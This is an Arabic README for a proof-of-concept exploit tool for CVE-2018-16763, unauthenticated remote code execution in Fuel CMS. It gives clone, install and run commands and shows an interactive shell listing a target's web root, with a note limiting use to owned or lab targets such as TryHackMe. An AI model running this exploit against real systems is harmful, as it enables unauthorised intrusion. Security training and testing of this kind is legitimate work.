
استغلال (PoC) لإثبات المفهوم لـ CVE-2018-16763 (Fuel CMS - تنفيذ التعليمات البرمجية عن بُعد دون مصادقة مسبقة).
استغلال إثبات المفهوم (PoC) لـ CVE-2018-16763 (Fuel CMS - تنفيذ التعليمات البرمجية عن بُعد دون مصادقة).
يعمل هذا البرنامج بلغة بايثون 3 كإثبات مفهوم لثغرة CVE-2018-16763 في نظام إدارة المحتوى Fuel CMS. تحديدًا، تسمح الثغرة بتقييم كود PHP عبر معامل pages/select/filter (المطبّق في إثبات المفهوم هذا)، مما يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد دون مصادقة، وهي ثغرة نظامية حرجة.
git clone https://github.com/saccles/CVE-2018-16763-Proof-of-Concept.git
cd CVE-2018-16763-Proof-of-Concept
python3 -m pip install -r requirements.txt
قم بتشغيل سكريبت الاستغلال ضد هدف ضعيف. (قم بتشغيل السكريبت فقط ضد هدف تملكه أو هدف مقدم من TryHackMe، HackTheBox، أو أي موقع آخر للاختراق الأخلاقي!) أوصي بالاطلاع على تحدي "Ignite" من TryHackMe لمزيد من التفاصيل. يمكنك أيضًا تنزيل تطبيق Fuel CMS الضعيف من exploit-db.com.
python3 CVE-2018-16763.py -u URL
[DEBUG] Connecting to http://10.10.60.46 ...
[DEBUG] Succesfully connected!
Enter Command:
$ ls -la
total 52
drwxrwxrwx 4 root root 4096 Jul 26 2019 .
drwxr-xr-x 3 root root 4096 Jul 26 2019 ..
-rw-r--r-- 1 root root 163 Jul 26 2019 .htaccess
-rwxrwxrwx 1 root root 1427 Jul 26 2019 README.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 assets
-rwxrwxrwx 1 root root 193 Jul 26 2019 composer.json
-rwxrwxrwx 1 root root 6502 Jul 26 2019 contributing.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 fuel
-rwxrwxrwx 1 root root 11802 Jul 26 2019 index.php
-rwxrwxrwx 1 root root 30 Jul 26 2019 robots.txt
python3 CVE-2018-16763.py -h
usage: CVE-2018-16763.py [-h] -u URL
This tool exploits CVE-2018-16763 on Fuel CMS.
options:
-h, --help show this help message and exit
-u URL, --url URL Fuel CMS url.
Silas Accles [saccles]
هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE.md للتفاصيل.
مستوحى بشكل كبير من برامج Exploit-DB، ونصوص PoC لـ Vozec، وإثبات المفهوم الأصلي الذي طوره Padsala Trushal.